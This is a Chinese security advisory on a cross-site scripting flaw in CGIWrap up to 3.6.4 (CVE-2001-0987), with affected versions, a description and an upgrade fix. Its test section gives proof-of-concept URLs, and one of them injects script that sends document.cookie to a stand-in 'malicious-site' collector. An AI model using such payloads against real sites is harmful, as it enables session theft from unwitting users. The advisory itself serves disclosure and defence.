首页 -> 安全研究

安全研究

安全漏洞
CGIWrap Cross-Site Scripting 漏洞

发布日期:2001-07-22
更新日期:2001-07-27

受影响系统:

Nathan Neulinger CGIWrap 3.6.4
Nathan Neulinger CGIWrap 3.6.3
Nathan Neulinger CGIWrap 3.6.2
Nathan Neulinger CGIWrap 3.6.1
Nathan Neulinger CGIWrap 3.6
Nathan Neulinger CGIWrap 3.5
Nathan Neulinger CGIWrap 3.4
Nathan Neulinger CGIWrap 3.3
Nathan Neulinger CGIWrap 3.24
Nathan Neulinger CGIWrap 3.23
Nathan Neulinger CGIWrap 3.22
Nathan Neulinger CGIWrap 3.21
Nathan Neulinger CGIWrap 3.2
Nathan Neulinger CGIWrap 3.11
Nathan Neulinger CGIWrap 3.1
Nathan Neulinger CGIWrap 3.0
Nathan Neulinger CGIWrap 2.7
Nathan Neulinger CGIWrap 2.6
Nathan Neulinger CGIWrap 2.5
Nathan Neulinger CGIWrap 2.4
Nathan Neulinger CGIWrap 2.3
Nathan Neulinger CGIWrap 2.2
Nathan Neulinger CGIWrap 2.1
Nathan Neulinger CGIWrap 2.0
Nathan Neulinger CGIWrap 1.0
不受影响系统:

Nathan Neulinger CGIWrap 3.7
描述:

BUGTRAQ  ID: 3084
CVE(CAN) ID: CVE-2001-0987

CGIWrap是一个免费,开放源代码的程序,用来加强CGI的安全性。

CGIWrap没有过滤用户输入的脚本命令,一个Web用户可能通过要显示用户输入的表单提
交一个恶意的链接,如留言本,论坛等等。如果其它用户点击这个链接,恶意代码就会
在该用户的浏览器中执行。

<*来源:TAKAGI, Hiromitsu (takagi@etl.go.jp) *>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


TAKAGI, Hiromitsu (takagi@etl.go.jp)提供了如下测试代码:

验证漏洞:
http://www.example.org/cgi-bin/cgiwrap/%3CS%3E
http://www.example.org/cgi-bin/cgiwrap/<S>
http://www.example.org/cgi-bin/cgiwrap/~nneul/<S>TEST</S>

执行JavaScript代码:
http://www.example.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>alert(document.domain)
</SCRIPT>
http://www.example.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>document.write(documen
t.domain)</SCRIPT>
http://www.example.org/cgi-bin/cgiwrap/<IMG%20SRC=javascript:alert(document.
domain)>

获得“www.example.com”的Cookie:
http://www.example.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>window.open("http://ma
licious-site/save.cgi%3F"+escape(document.cookie))</SC
RIPT>


建议:

升级到最新版本

厂商补丁:

目前厂商已经发布了CGIWrap新版本来修正这个问题:

http://cgiwrap.unixtools.org/


浏览次数:3620
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障